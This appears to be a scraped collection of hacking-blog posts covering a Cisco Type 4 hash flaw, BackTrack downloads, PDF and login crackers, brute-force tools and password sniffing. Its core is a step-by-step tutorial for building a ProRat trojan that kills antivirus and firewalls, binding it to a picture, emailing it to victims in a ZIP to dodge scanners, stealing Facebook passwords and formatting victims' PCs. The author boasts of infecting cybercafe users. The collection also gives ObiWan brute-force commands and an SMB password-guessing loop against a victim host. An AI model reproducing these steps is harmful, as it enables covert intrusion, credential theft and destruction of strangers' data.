Cisco Type 4 Passwords cracked–Coding mistake endangers devices

Cisco has issued a security advisory intimating that its new password hashing algorithm TYPE 4 is vulnerable,which allows Cisco TYPE 4 encoded hashes to be cracked easily. TYPE 4 is an update of TYPE 5 , and was supposed to salt passwords and apply 1000 iterations of SHA-256 .  Well, engineers at Cisco actually miscoded the algorithm by forgetting to salt passwords and setting the number of iterations to 1 which makes it even weaker than TYPE 5 algorithm .

“This approach causes a Type 4 password to be less resilient to brute-force attacks than a Type 5 password of equivalent complexity.”

Also, the code base (CISCO IOS 15) also disables TYPE 5 encryption on devices. Well..talk about rubbing salt on wounds.

As per advisory -

"A device running a Cisco IOS or IOS XE release with support for Type 4 passwords lost the capability to create a Type 5 password from a user-provided plaintext password.Backward compatibility problems may arise when downgrading from a device running a Cisco IOS or IOS XE release with Type 4 password support and Type 4 passwords configured to a Cisco IOS or Cisco IOS XE release that does not support Type 4 passwords. Depending on the specific device configuration, the administrator may not be able to log in to the device or to change into privileged EXEC mode, requiring a password recovery process to be performed."

It was meant to be discovered inevitably. Folks at Hashcat - Philipp Schmidt and Jens Steube found it and were able to decode a hash posted at inetpro.org . Since hashes were weak, the information was more than enough to crack millions of hashes in hours if anyone gets their hands on hashes. 

The aftermath ? Cisco says it will be creating new password type to counter it with new as of now unknown commands to implement it.  In the meantime, Cisco says you “may” want to replace Type 4 password with Type 5 , as quoted -

There are two options to generate a Type 5 password:

• Using another device running a Cisco IOS or Cisco IOS XE release without Type 4 support
• Using the openssl command-line tool (part of the OpenSSL Project)

You can read the advisory here

You might also want to read  -

• Static VRRP over Cisco and testing it.
• EIGRP Cheatsheet – EIGRP in 15 min

Backtrack 4 Download for Windows VMWare & Torrents

BackTrack is a live CD Linux distribution that focuses on penetration testing. A merger of two older security-related distros — Whax and Auditor Security Collection — BackTrack bundles more than 300 security tools.

BackTrack is based on the SLAX distribution (a live CD derived from Slackware) and runs a patched 2.6.20 kernel. It offers users both KDE and Fluxbox desktop environments.

To start using BackTrack, download the ISO image and burn it to a CD. Insert the disc and boot your machine. Once booted, the system start at runlevel 3 (text mode), where you must log in as root and choose whether to start KDE or Fluxbox or just use the terminal.

BackTrack provides clear, concise instructions for logging in, starting the window manager, and configuring the video card before you see the login prompt. If you’ve never used BackTrack before, use a graphical environment, since it will help you understand how all the included applications are organized and let you take advantage of some graphical utilities. When the window manager comes up you’ll find some ordinary desktop programs, such as Firefox, Gaim, K3b, and XMMS, within a nice environment with beautiful wallpaper and window transparency.

Don’t let the attractive appearance fool you — BackTrack packs a punch. The security tools are arranged inside a Backtrack submenu. This is a big improvement over older releases, because you can easily follow an attack methodology: starting by collecting information and end by hiding your actions.

The tools are arranged in 12 categories, such as vulnerability identification, penetration, privilege escalation, radio network analysis, and reverse engineering. Among the more than 300 security tools you’ll find such familiar names as the Metasploit Framework, Kismet, Nmap, Ettercap, and Wireshark (previously known as Ethereal).

One of the core points of this release is the attention to detail. For example, when you choose most of the programs from the Backtrack menu, a console window opens with the output of the program’s help. Some tools have been bundled with scripts that in a few steps configure and run the program for you. For example, if you run the Snort intrusion detection application, a script asks for some passwords and then sets up MySQL, Apache, Base, and Snort itself so you can easy browse alert logs via a Web browser.

If you open Firefox or Konqueror you’ll find some useful security-oriented bookmarks. In the Documents submenu the developers have included PDF manuals for the ISSAF and OSSTMM security methodologies. There are also some tools that you wouldn’t expect inside a live CD; for example, you have a popular debugger for Windows, OllyDbg, which runs fine through Wine, so you can even debug .exe files.

If you like the live CD, you can install BackTrack to a hard drive (decompressed, it requires 2.7GB of space) or USB memory stick (compressed, 700MB) using a graphical wizard.

While BackTrack is an excellent tool, nothing is perfect. Unfortunately it doesn’t include Nessus, the popular security scanner, due to license problems. I tried to start PostgreSQL from the Services menu, but it gave an error. And it seems as if the developers forgot to update the Backtrack menu in Fluxbox, because it offers the previous version arrangement. Tools like VMware and Nessus appear on the menu but are broken links because they have been removed from this release.

Despite a few little bugs and problems, BackTrack is the best distribution I’ve found for handling security-oriented tasks out of the box.

Download Links :

Last Update: 11.01.2010

Description: Image Download

Name:: bt4-final.iso

Size: 1570 MB

MD5: af139d2a085978618dc53cabc67b9269

BackTrack 4 Final Release Download

BackTrack 4 Final Release Torrents

Description: VM Image Download

Name:: bt4-final-vm.zip

Size: 2000 MB

MD5: 733b47fad1d56d31bc63c16b3706a11c

BackTrack 4 Final Release VMWare Image Download

BackTrack 4 Final Release VMWare Image Torrents

FOR OLDER VERSIONS CLICK HERE

To learn HOW TO USE BACKTRACK & for all BACKTRACK TUTORIALS & COMMANDS: CLICK HERE & JOIN THIS FORUM

Facebook Password Hacking Software: Download Trojans & Keyloggers

How to Hack Facebook Account Passwords Using Trojans & Keyloggers

Here I am demonstrating using PRORAT trojan. You can also check the list of trojans & Keyloggers here which I have already posted few months back. You can use any trojan or keylogger as per your ease. The basic functionality of all backdoors are same. Pls make note that all these hacking tools and softwares are detected by antivirus. You have to uninstall or close you running antivirus first. I strictly recommend you to try these trojans & keyloggerson some testing system first.

Step-1: Download latest version of ProRat v1.9 Fix2. CLICK HERE to download. The ZipPass is : pro

STEP-2: Creating the ProRat server. Click on the "Create" button in the bottom. Choose "Create ProRat Server".

STEP-3: Open Notifications. Select second option "Mail Notification". In the E-MAIL field you will see a mail

id: bomberman@yahoo.com. Remove this mail ID and give your own mail id here. You will receive a notification

email on this email id whenever you victim will be connected to internet from the infected system.

STEP-4: Open General settings. This tab is the most important tab. In the check boxes. here is a quick overview

of what they mean and which should be checked.

Key:

[ ] = dont check

[x] = check

[ ] Give a Fake Error Message. (when they open the file, it gives an error message.

[x] Melt server on install. (this will cause the server to ALWAYS connect to the internet when the victim gets

online)

[x] Kill AV - FW on Install. (this causes the anti-virus and firewalls to SHUT DOWN and stay off once installed

on the victim's computer.

[x] Disable Windows XP SP2 security center

[x] Disable Windows XP Firewall

[x] Clear Windows XP Restore Points

[ ] Dont send LAN notifications ( keeps other computers on the victim's network from knowing about you )

[ ] Protection for removing local server

In the Invisibility Box, check all 4 boxes.

STEP-5: Open Bind With File. You can bind your server\downloader server with a file that you want. You must

click on the ''Bind the server with a file'' button and then the file button will be activated. You can choose

a file to be binded with the server now. A good suggestion is a picture because that is a small file and its

easer to send to the people you need.

STEP-6: Open Server Extensions. I prefer using .exe files, because it is cryptable. Mostly crypters don't

support .bat/.pif/.com etc. So use .exe files.

STEP-7: Open Server Icon. You can select the one you want to use with the server from the small pictures on the

menu. You can use an icon from your computer also. Press the "Choose new icon" button.

STEP-8: After this, press "Create server", your server will be in the same folder as ProRat. A new file with

name "binded_server" will be created. Rename this file to something describing the picture.

[NOTE: PLS DO NOT OPEN THE FILE "binded_server" on your system.]

STEP-9: Sending this file "binded_server" to victim. You can send this trojan server via email, pendrive or if

you have physical access to the system, go and run the file.

From EMAIL, you can not send this file as it is because it will be detected as TROJAN OR VIRUS. Password protect this file with

ZIP and then email it. Once your victime download this ZIP file, ask him to unlock it using ZIP password. When

the victim will double click on the file, he will be in your control.

STEP-10: Connecting to the victim's computer. Once the server has been sent and the person has opened this ZIP

folder, they will now be infected with it. AND HAVE NO CLUE ABOUT IT!. On the top of the ProRat program you

will see a box in the upper left corner. Type in the victim's IP address and make sure the port is 5110. Now

press Connect. You should now see a pop-up box wanting to know a password. Remember the password you entered

while creating the server? that is what you need to type. By default, it is "123456" without quotes.

STEP-11: Check your email, (junk in needed), and find the “Your victim is online”. Copy and paste the IP

address onto ProRat where it says “IP:[127.0.0.1]“. Press CONNECT, DO NOT CHANGE THE PORT, if u did change it

back to 5110. Type in the password (default is usually 123456, it is in the email). Your done, now you can mess

with the buttons on the program. Especially the GIVE DAMAGE button. It will damage their pc by format, and will

make the computer useless.

Download latest version of ProRat v1.9 Fix2. CLICK HERE to download. The ZipPass is : pro

FAQ:

Q: Error message:Windows cannot access the specified deice, path, or file. You may not have the appropriate

permissions to access the item. What do I do?

A: Simple! Delete the ProRat program. Delete it. What happen was, your AV has altered the file. OR it could be m

alacious content. Either way, delete it. NEXT, remember the file you downladed? Un extract the file again and

re run. You will not need to remake a server file and such if it has been sent to the victim. Just open ProRat

and make sure your AV is shut off. Reconnect. There ya go.

Q: What operating systems are supported by ProRat?

A: Windows 95/95B

Windows 98/98SE

Windows ME

Windows NT 4.0

Windows 2000

Windows XP

Windows Vista

Q: When I have downloaded ProRat, my antivirus detect it as virus. What should I do?

A: Well, since RATs are hacktools, and all the hack tools are detected as viruses, ProRat is detected as virus

also. To download and install ProRat you will need to turn off your anti-virus.

Q: What should I do after I install my server?

A: After you install your server, you should spread it. Few years back I have installed my server manually on

1000's of cyber cafe in my city. I hacked almost the entire city cafe users secret information. This is the

best way. Go to nearest cyber cafe's and manually install your trojan server.

Q: I've created a server, but I don't see it in the directory. Why?

A: That's caused by your antivirus. The server is detected, and it won't let it. I suggest you to remove your

antivirus if you are going to use RATs.

Q: I've send my server to a friend on MSN, but he doesn't connect.

A: That's because he has an antivirus or firewall and it won't let him to connect in your RAT. To make it

FUD(Fully Undetectable), you should use a crypter.

Q: Is ProRat illegal?

A: No. ProRat is a legal RAT. The author of ProRat created his program for legitimate purposes. For example,

there are many legal activities. Parents can use keyloggers to protect their children from online abuse etc.

Some people use it for stealing passwords, credit cards and more but it's not a software which breaks the law,

but the person who uses it.

Q: Can ProRat be used for legitimate purposes?

A: Yes. You can monitor your children online activity.. to make sure they don't visit pornographic websites.

You can find out if someone uses your computer while you are away, ensure no one is accessing your personal

files while you are away and more.

Q: How do I make my server FUD?

A: You should use a binder or crypter. Also check the below links how to make trojan or keylogger fully undetectable from antivirus.

• Wrappers
• How to bypass antivirus

THIS TUTORIAL HAS BEEN CREATED WITH THE HELP OF AN UNDERGROUND HACKER flAmingw0rm. THANKS TO YOU MAN TO MAKE

THIS POSSIBLE.

Readers, we don't want any thing from you in return except a thanks. Pls comment here so that we can post

better contents and improve the stuff quality.

PDF Password Cracker: Download PDF Password Remover

The PDF Password Remover can be used to decrypt protected Adobe Acrobat PDF file

The PDF Password Remover is a useful and reliable software which can be used to decrypt protected Adobe Acrobat PDF files, which have "owner" password set, preventing the file from editing (changing), printing, selecting text and graphics.

Decryption is being done instantly. Decrypted file can be opened in any PDF viewer (e.g. Adobe Acrobat Reader) without any restrictions -- i.e. with edit/copy/print functions enabled. All versions of Adobe Acrobat (including 7.x, which features 128-bit encryption) are supported.

The standard security provided by PDF consists of two different methods and two different passwords, 'user password' and 'owner password'.

A PDF document may be protected by password for opening ('user' password) and the document may also specify operations that should be restricted even when the document is decrypted: printing; copying text and graphics out of the document; modifying the document; and adding or modifying text notes and AcroForm fields (using 'owner' password).

Limitation:

Please note that PDF Password Remover doesn't work with documents which have 'user' password (preventing the files from being opened), if both user and owner passwords are unknown the PDF Password Remover will fail.

Here are some key features of "PDF Password Remover":

• Easy to use
• Supports drag and drop PDF files
• Do NOT need Adobe Acrobat software
• Remove the security settings from your encrypted PDF file is instant
• Supports command line operation (for manual use or inclusion in scripts)
• Supports PDF1.6 protocol (formerly only supported by Acrobat 7.0 application)
• Supports PDF1.6 (Acrobat 7.x) files, including 40-bit RC4 decryption, 128-bit RC4 decryption, compressed files and unencrypted metadata
• Batch operation on many files from command line
• Supports Adobe Standard 40-bit Encryption and Adobe Advanced 128-bit Encryption
• Decrypts protected Adobe Acrobat PDF files, removing restrictions on printing, editing, copying

DOWNLOAD HERE

Network Logon Cracker: THC-Hydra

A very fast network logon cracker which support many different services

Currently this tool supports:

TELNET, FTP, Firebird, HTTP-GET, HTTP-HEAD, HTTPS-GET, HTTP-HEAD, HTTP-PROXY,HTTP-PROXY-NTLM,HTTP-FORM-GET HTTP-FORM-POST, HTTPS-FORM-GET,HTTPS-FORM-POSTLDAP2, LADP3, SMB, SMBNT, MS-SQL, MYSQL,POSTGRES,POP3-NTLM, IMAP, IMAP-NTLM, NCP, NNTP, PCNFS, ICQ, SAP/R3, Cisco auth,Cisco enable, SMTP-AUTH, SMTP-AUTH-NTLM, SSH2, SNMP, CVS, Cisco AAA,REXEC, SOCKS5, VNC, POP3 and VMware Auth.

Changelog for 5.7:

* Added ncp support plus minor fixes (by David Maciejak @ GMAIL dot com)

* Added an old patch to fix a memory from SSL and speed it up too from kan(at)dcit.cz

* Removed unnecessary compiler warnings

* Enhanced the SSH2 module based on an old patch from aris(at)0xbadc0de.be

* Fixed small local defined overflow in the teamspeak module. Does it still work anyway??

Download: http://freeworld.thc.org

Download Free FSCRACK: GUI for John the Ripper password cracker

FSCrack is a front end for John the Ripper (JtR) that provides a graphical user interface (GUI) for access to most of JtR’s functions.

JtR is described as follows (from http://www.openwall.com/john/): "John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt (3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches."

System Requirements

• John the Ripper binary (win32) written by Solar Designer. Available at http://www.openwall.com/john/
• .Net framework 2.0. Available at: http://msdn.microsoft.com/netframework/downloads/updates/default.aspx
• (Optional) NTLM (MD4) hash support patch written by Olle Segerdahl. Available at: http://olle.nxs.se/software/john-ntlm/

DOWNLOAD HERE

SOURCE: http://www.foundstone.com

Hack Adobe Acrobat PDF Password | How to Decrypt Adobe Acrobat PDF Files: Download PDF Decrypter

PDF Decrypter v2.50 | 6MB

PDF Decrypter 2.5 can be used to decrypt the protected Adobe Acrobat PDF files, which have “owner” password set, preventing the file from editing, printing, selecting text and graphics etc. It is the fast, affordable way to decrypt a lot of protected pdf files to decryped pdf files once time for saving your time! Its easy-to-use interface allows you to decrypt PDF files by simply few clicks.

The decrypted file can be opened in any PDF viewer (e.g. Adobe Acrobat Reader). All versions of Adobe Acrobat PDF (including 7.x, which features 128-bit encryption) are supported. And PDF decrypter V2.5 don’t need any software such as adobe acrobat.

Download link 1

Download Link 2

Password guessing Countermeasures

Password guessing Countermeasures

• Block access to TCP and UDP ports 135–139.

• Disable bindings to Wins client on any adapter.

• Use complex passwords

• Log failed logon attempts in Event viewer - Security log full event 529 or 539 - Logon/Logoff

Monitoring Event Viewer Logs

• Logging is of no use if no one ever analyzes the logs

• VisualLast from www.foundstone.com formats the event logs visually

VisualLast is considered as the advanced version of NTLast with a number of additional and sophisticated features. The program is designed to allow network administrators to view and report individual users log on and log off times and these events can be searched by time frames. This is an invaluable feature to security analysts looking for intrusion details.

---Regards,
Amarjit Singh

Password Guessing

Password guessing attacks can be carried out manually or via automated tools.

Password guessing can be performed against all types of Web Authentication

The common passwords used are:

root, administrator, admin, operator, demo, test, webmaster, backup, guest, trial, member, private, beta, [company_name] or [known_username]

Passwords are the principal means of authenticating users on the Web today. It is imperative that any Web site guard the passwords of its users carefully. This is especially important since users, when faced with many Web sites requiring passwords; tend to reuse passwords across sites. Compromise of a password completely compromises a user.

Attack Methods

Often Web sites advise users to choose memorable passwords such as birthdays, names of friends or family, or social security numbers. This is extremely poor advice, as such passwords are easily guessed by an attacker who knows the user. The most common way an attacker will try to obtain a password is through the dictionary attack'. In a dictionary attack, the attacker takes a dictionary of words and names, and tries each one to see if it is the require password. This can be automated with programs which can guess hundreds or thousands of words per second. This makes it easy for attackers to try variations: word backwards, different capitalization, adding a digit to the end, and popular passwords.

Another well-known form of attack is the hybrid attack. A hybrid attack will add numbers or symbols to the filename to successfully crack a password. Often people change their passwords by simply adding a number to the end of their current password. The pattern usually takes this form: first month password is "site"; second month password is "site2"; third month password is "site2"; and so on. A brute force attack is the most comprehensive form of attack, though it may often take a long time to work depending on the complexity of the password. Some brute force attacks can take a week depending on the complexity of the password.

Hacking Tool: WebCracker

• WebCracker is a simple tool that takes text lists of usernames and passwords and uses them as dictionaries to implement Basic authentication password guessing.
  
• lt keys on "HTTP 302 Object Moved" response to indicate successful guess.
  
• lt will find all successful guesses given in a username/password.
  

Webcracker allows the user to test a restricted-access website by testing id and password combinations on the web site.This program exploits a rather large hole in web site authentication methods. Password protected websites may be easily brute-force hacked, if there is no set limit on the number of times an incorrect password or User ID can be tried.WebCracker is a simple tool that takes text lists of usernames and passwords and uses them as dictionaries to implement Basic authentication password guessing.

• It keys on "HTTP 302 Object Moved" response to indicate successful guess.
  
• It will find all successful username/password given in the list.
  

Hacking Tool: Brutus

http://www.hoobie.net/brutus/

• Brutus is a generic password guessing tool that cracks various authentication.
  
• Brutus can perform both dictionary attacks and brute-force attacks where passwords are randomly generated from a given character.
  
• Brutus can crack the following authentication types:
  
• HTTP (Basic authentication, HTML Form/CGI); POP3; FTP; SMB; Telnet
  
  
  

Brutus is an online or remote password cracker. More specifically it is a remote interactive authentication agent. Brutus is used to recover valid access tokens (usually a username and password) for a given target system. Examples of a supported target system might be an FTP server, a password protected web page, a router console a POP3 server etc. It is used primarily in two ways: To obtain the valid access tokens for a particular user on a particular target. To obtain any valid access tokens on a particular target where only target penetration is required.

Brutus does very weak target verification before starting; in fact all it does is connect to the target on the specified port. In the context of Brutus, the target usually provides a service that allows a remote client to authenticate against the target using client supplied credentials. The user can define the form structure to Brutus of any given HTML form. This will include the various form fields, any cookies to be submitted in requests, the HTTP referrer field to send (if any) and of course the authentication response strings that Brutus uses to determine the outcome of an authentication attempt.

If Brutus can successfully read forms of the fetched HTML page then each form will be interpreted and the relevant fields for each form will be displayed. Any cookies received during the request will also be logged here. Brutus handles each authentication attempt as a series of stages, as each stage is completed the authentication attempt is progressed until either a positive or negative authentication result is returned at which point Brutus can either disconnect and retry or loop back to some stage within the authentication sequence.

Hacking Tool: ObiWan

http://www.phenoelit.de/obiwan/docu.html

• ObiWan is a powerful Web password cracking tool. It can work through a proxy.
  
• ObiWan uses wordlists and alternations of numeric or alpha-numeric characters as possible as passwords.
  
• Since Webservers allow unlimited requests it is a question of time and bandwidth to break into a server system.
  

ObiWaN stands for "Operation burning insecure Web server against Netscape". It is called Project 2086 now, after 2068 the number of the RFC which describes the HTTP/1.1 protocol. 11.1 is the section which describes the basic authentication scheme. This is the mostly used authentication scheme for web server and used by ObiWaN.

Web servers with simple challenge-response authentication mechanism mostly have no switches to set up intruder lockout or delay timings for wrong passwords. Every user with a HTTP connection to a host with basic authentication can try username-password combinations as long as he/she like it. This allows the attacker to prod the system as long as he wants to.

Like other programs for UNIX system passwords (crack) or NT passwords (lophtcrack) ObiWaN uses wordlists and alternations of numeric or alpha-numeric characters as possible passwords. Since web servers allow unlimited requests it is a question of time and bandwidth to break in a server system. The first way is to run ObiWaN more than once. The following example tries to crack username eccouncil on the intranet.

./ObiWaN -h intranet -a eccouncil -w list.txt 

To run it with alphanumeric variation with a depth of 2

./ObiWaN -h intranet -a eccouncil -w list.txt -A 2 

To run it in brute force loop mode

./ObiWaN -h intranet -a eccouncil -w list.txt -b 6 -B 8 

Hacking Tool: Munga Bunga

Munga Bunga's HTTP Brute Forcer is a utility utilizing the HTTP protocol to brute force into any login mechanism/system that requires a username and password, on a web page (or HTML form). To recap - A password usually only contains letters. In such a case the quantity of characters in a charset is 26 or 52, depending on usage of registers - both of them or just one. Some systems (Windows, for example) don't make any difference between lower-case and uppercase letters. With an 8-characters' long password the difference would amount to 256 times, which is really significant.

Brute force method can sometimes be very effective when it is combined with the functionality of the program. Munga Bunga is a tool which can be used for breaking into emails, affiliate programs, web sites, any web based accounts, launching DoS attacks, flooding emails, flooding forms, flooding databases and much more; though DoS attacks and flooding activity are not supported or documented in the documentation. Apart from this, the attacker can write definition files. These are files ending in the .def extension, and contain information about a particular server, and the data to submit to it. They are used to extend the power and capability of the program, based on the user's own definitions. The software comes bundled with some definition

The tool claims to be capable of brute forcing, any thing that can be entered via a HTML form with a password and username. The attack methodology goes as follows: The attacker uses a password file in order for the program to attempt and enter the account(s), with the specified passwords. In addition, he can write a definition file for the form he wants to crack into.

Hacking Tool: PassList

Passlist is another character based password generator.

Passlist is a character based password generator that implements a small routine which automates the task of creating a "passlist.txt" file for any brute force tool. The program does not require much information to work. The tool allows the user to specify the generation of passwords based on any given parameter. For instance, if the user knows that the target system's password starts with a particular phrase or number, he can specify this. This makes the list more meaningful to the user and easier for the brute forcer. He can also specify the length required such as the maximum number of random characters per password, apart from the maximum number of random

A partial list is given below.

• Refiner is used to generate a wordlist containing all possible combinations of a partial password, which an attacker may have obtained by other means. Refiner will then generate a text file containing all possible combinations.
  
• WeirdWordz allows the user to just select an input file and as an output file, makes all sorts of combinations of the lines/words in the input file.
  
• Raptor 1.4.6 - creates words using many different filters from html files to create a wordlist.
  
• PASS-PARSE V1.2 - Pass-parse will take any file and turn all the words into a standard type password list, while stripping anything that's not alphanumeric. The main idea behind it is that while trying to crack the password of a personal website, the password may appear on the site when the person describes their interests. This will parse through an html file and create a list of words from that page to try as passwords.

Web Based Password Cracking Techniques

Passport authentication messages are passed in the form of electronic "tickets" that are used to inform the site that the user has signed in successfully. A ticket is a small amount of data that indicates the time the sign in occurred, when the user last manually signed in, and other information that is useful to the authentication process. Within the Passport system, these tickets take the form of cookies.

To obtain a ticket, a user with a Passport account signs in to the site or tries to access a protected Web page within the merchant site (e.g., a page that requires user authentication before allowing access). This redirects the user to a special page on Passport.com. This page takes information that the merchant site has appended to the URL and processes it. This allows the Passport service to know which merchant site has referred the user, and which merchant site to return the user to. Once the information has been processed, Passport redirects the user to a page on Passport.net.

Once the user enters their credentials, they are sent back to the Passport.com domain. Once there and verified, Passport writes a cookie on the user's browser that stores information about this sign in. This is called a "ticket-granting-cookie" and it is used in subsequent sign in attempts. Then Passport redirects them back to your site.

When the user arrives back at the merchant site, they bring two encrypted packets of information attached to the query string. Software called the Passport Manager which is installed on the merchant's authenticating servers reads those packets and writes them as encrypted cookies in the merchant site domain.

The first cookie contains the authentication ticket information. The second contains any profile information that the user has chosen to share, and any operational information and unique identifiers that need to be passed. These packets are encrypted with a unique secret key that is shared between Passport and the merchant site. This helps to ensure that only the merchant can decode these messages.

The merchant site then takes this information and uses it to issue his cookies. Since these cookies are issued from the merchant domain, the merchant will have access to them. The merchant can use the Passport User ID to look a user up in the merchant database and perform authorization tasks.

When the user navigates to another Passport participating site, the new site has several choices to make about how they will authenticate this user. When the user clicks the sign in button, they are directed to the Passport service exactly as they were at their first sign in. The difference is that this time there is a ticket-granting-cookie saved on the browser that Passport can read.

Since the ticket contains the time that it was issued, it allows the referring site to decide how "fresh" the cookie needs to be in order for the site to accept it. If the ticket meets the rules the referring site has chosen, the user is redirected back to the referring site along with the encrypted ticket and profile cookies. If the ticket is too old, the user is prompted to re-enter their credentials.

Note

However, passport has been plagued with security issues - right from reuse of authentication cache to privacy flouting activities. Apart from this exploits that plague Microsoft based web systems such as Unicode exploits, cross site scripting and cookie stealing cast more than a shadow of doubt on this means of authentication.

A few links exploring these issues are given below:

• http://alive.znep.com/~marcs/passport/

• http://www.wired.com/news/technology/0,1282,48105,00.html

• http://www.epic.org/privacy/consumer/microsoft/

• http://avirubin.com/passport.html

Forms-Based Authentication

• It is highly customizable authentication mechanism that uses a form composed of HTML with

  and tags delineating fields for users to input their username/password.

• After the data input via HTTP or SSL, it is evaluated by some server-side logic and if the credentials are valid, then a cookie is given to the client to be reused on subsequent visits.

• Forms based authentication technique is the popular authentication technique on the internet.

Conventionally, web applications had users authenticate themselves through a Web form. The user's credentials as captured by this form are submitted to the business logic which determines the authorization level. If the user is authenticated, the application generates a cookie or session variable. This cookie contains anything from a valid session identification access token to customized personalization values. The time period for which the cookie is valid or the contents stored in it are subject to security risks.

Forms Authentication is a system in which unauthenticated requests are redirected to a web form where the unauthenticated users are required to provide their credentials. In the context of ASP.NET, it extends similar logic into its architecture as an authentication facility, Forms Authentication. Forms Authentication is one of three authentication providers. Windows Authentication and Passport Authentication make up the other two providers.

Reverting back to the web based authentication method, on being properly verified by the application, based on the credentials input by the user, an authorization ticket is issued by the Web application in the form of a cookie. In essence, Forms Authentication is a means for wrapping the web application around the login user interface and verification processes.

Note

Forms Authentication Flow A client generates a request for a protected resource (e.g. a transaction details page). IIS (Internet Information Server) receives the request. If the requesting client is authenticated by IIS, the user/client is passed on to the web application. However, if Anonymous Access is enabled, the client will be passed onto the web application by default. Otherwise, Windows will prompt the user for credentials to access the server's resources. If the client doesn't contain a valid authentication ticket/cookie, the web application will redirect the user to the URL where the user is prompted to enter their credentials to gain access to the secure resource. On providing the required credentials, the user is authenticated / processed by the web application. The web application also determines the authorization level of the request, and, if the client is authorized to access the secure resource, an authentication ticket is finally distributed to the client. If authentication fails, the client is usually returned an Access Denied message.

Hacking Tool: WinSSLMiM

• http://www.securiteinfo.com/outils/WinSSLMiM.shtml

• WinSSLMiM is an HTTPS Man in the Middle attacking tool. It includes FakeCert, a tool to make fake certificates.

• It can be used to exploit the Certificate Chain vulnerability in Internet Explorer. The tool works under Windows 9x/2000.

• Usage:

  • FakeCert: fc -h

  • WinSSLMiM: wsm -h

We have seen how digital certificates are used for authentication purposes. Typically, the administrator of a web site opts to provide secure communication through the SSL. To enable this, the administrator generates a certificate and gets it signed by a Certification Authority. The generated certificate will list the URL of the secure web site in the Common Name (CN) field of the Distinguished Name section. The CA verifies that the administrator legitimately owns the URL in the CN field, signs the certificate, and gives it back.

[CERT - Issuer: VeriSign / Subject: VeriSign] -> [CERT - Issuer: VeriSign / Subject: www.website.com]

Note

When a web browser receives the certificate, it should verify that the CN field matches the domain it just connected to, and that it is signed by a known CA certificate. No man in the middle attack is possible because it should not be possible to substitute a certificate with a valid CN and a valid signature. However, it is possible that the signing authority has been delegated to more localized authorities. In this case, the administrator of www.website.com will get a chain of certificates from the localized authority:

Attack Methods

However, as far as IE is concerned, anyone with a valid CA-signed certificate for any domain can generate a valid CA-signed certificate for any other domain. If an attacker wants to, he can generate a valid certificate and request a signature from VeriSign: [CERT - Issuer: VeriSign / Subject: VeriSign] -> [CERT - Issuer: VeriSign / Subject: www.attacker.com]

Then he can generate a certificate for any domain he wants to, and sign it using his CA-signed certificate: [CERT - Issuer: VeriSign / Subject: VeriSign]

-> [CERT - Issuer: VeriSign / Subject: www.attacker.com] -> [CERT - Issuer: www.attacker.com / Subject: www.amazon.com]

Since IE does not check the Basic Constraints on the www.attacker.com certificate, it accepts this certificate chain as valid for www.amazon.com. This means that anyone with any CA-signed certificate (and the corresponding private key) can spoof anyone else. Any of the standard connection hijacking techniques can be combined with this vulnerability to produce a successful man in the middle attack.

Tools

WinSSLMiM is an HTTPS Man in the Middle attacking tool. It includes FakeCert, a tool to make fake certificates. It can be used to exploit the Certificate Chain vulnerability in Internet Explorer. The tool works under Windows 9x/2000.

---Regards,
Amarjit Singh

Free Online PDF Password Cracker: How to Crack PDF Passwords

Yesterday I have received an email from one of our reader. He was asking me to crack one password protected PDF file. As we know that if PDF is password protected, we can not do much with it. Sometimes we even can not take the printouts also. Viewable mode has very limited access. I have searched a lot on internet and found so many tools. I have cracked few of them and tried it in my testing LAB. But I was not happy...WHY??

The reason was, I can not keep the laptop always with me. Such password cracking requirement can be raised any time, anywhere. So I again start googling. This time I concentrate only on ONLINE PDF PASSWORD CRACKING ABSOLUTELY FREE. During my 7 minutes of search on google. I come across with very interesting site which I would like to share with you guys.

Welcome to FreeMyPDF.com!

Use this site to remove passwords and restrictions (such as printing, copying text, etc.) from PDFs.

Note: This only works for PDFs that you can open and read without any 3rd party plugins. PDFs that require a password to be viewed cannot be unlocked by this service.

This is because this is not cracking. Viewable PDFs with restrictions are not really protected, no more than a door with a broken lock, as opposed to password-protected PDFs.

Manual Password Cracking Algorithm

Manual Password Cracking Algorithm

• Find a valid user

• Create a list of possible passwords

• Rank the passwords from high probability to low

• Key in each password

• If the system allows you in - Success

• Else try till success

In its simplest form, password cracking can be automated using a simple FOR loop. In the example below, an attacker creates a simple text file with usernames and passwords that are iterated using the FOR loop.

A text file is created to serve as a dictionary from which the main FOR loop will draw usernames and passwords as it iterates through each line:

[file: credentials.txt] administrator "" 

administrator password 

administrator administrator 

[Etc.] 

From a directory that can access the text file the following command is typed:

c:\>FOR /F "tokens=1,2*" %i in (credentials.txt)^

More? do net use \\victim.com\IPC$ %j /u:victim.com\%i^ 

More? 2 >> nul^ 

More? && echo %time% %date% >> outfile.txt^ 

More? && echo \\victim.com acct: %i pass: %j >> outfile.txt 

c:\>type outfile.txt 

If there has been a successfully guessed username and  password from credentials.txt, outfile.txt will exist and contain the correct  user name and password. The attacker's system will also have an open session  with the victim server.

---Regards,
Amarjit Singh

Password Sniffing: How to sniff passwords from LAN

Password Sniffing

Password guessing is hard work. Why not just sniff credentials off the wire as users log in to a server and then replay them to gain access?

Most networks use the broadcast technology; which means that every message emanating from any computer on the network can be captured by every other computer on the network. Normally, the message is not taken by other computers as the intended recipient's mac address does not match their mac address. Therefore, all the computers except the recipient of the message will notice that the message is not meant for them, and ignore it. However, if a system has a sniffer program running on it, it can scan all the messages which traverse the network looking for passwords and other sensitive information. For instance, if a user logs into a computer across the network, and the attacker's system is running a sniffer program, the attacker can sniff out the login information such as user name and its corresponding password. This will make it easy for the attacker to login to the target system as an authentic user and compromise it further. This technique is called password sniffing.

This is a serious threat to users — such as remote users - who login to computers from remote sites. Therefore, the password security of a remote user is as good as the network he/she uses to access the remote computer.

Hacking Tool: LOphtcrack

• LC4 is a password auditing and recovery package distributed by @stake software. SMB packet capture listens to the local network segment and captures individual login sessions.

• With LOphtcrack password cracking engine anyone can sniff the ire for extended periods is most guaranteed to obtain Administrator status in matter of days.

